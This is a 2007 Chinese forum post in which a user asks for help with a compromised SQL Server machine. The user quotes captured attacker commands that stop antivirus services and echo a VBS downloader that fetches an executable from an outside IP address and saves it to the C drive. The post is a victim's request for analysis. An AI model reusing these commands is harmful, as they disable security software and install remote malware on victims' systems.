redstarcnhn - 2007-7-1 18:14:00
========Title========
开启SQL服务后出现的奇怪现象!【讨论】
========Content========
本人的系统是由MSDN版本精简而成,已打齐截止到目前所有的安全补,平时上网一切正常.可是最近安装了SQL并打上SP4以后,莫名其妙出现一些怪现象.一旦连接上网后,总是会自动运行本地CMD.EXE并且在C盘根目录下生成一个1.vbs文件,用工具查看其CMD进程信息为"Noron AntiVirus Auto protect Service"net stop Mcshieldnet stop "Panda Antivirus" echo dim HTTPGET>c:\1.vbsecho dim Data>>c:\1.vbsecho dim ExeURL="http://222.79.240.168:28009/84785_mssql.exe">>c:\1.vbsecho LocalPath="c:\winrcn.exe. ..."其中里面的IP地址每次并一样,查看端口连接情况发现该IP连接到本机SQL服务器上了(vbs文件中的IP会随着连接到SQL上的ip而变动).结束该进程后,又会自动运行CMD.用最新版的多种软件查杀均无发现,用SRENG2.4查看启动项目,也无可疑.如果只开启SQL服务而不上网的话,则不会出现这种情况.请高手帮忙分析这属于病毒还是攻击?应如何解决?(SQL为D版)
谢谢!
© 2000 - 2026 Rising Corp. Ltd.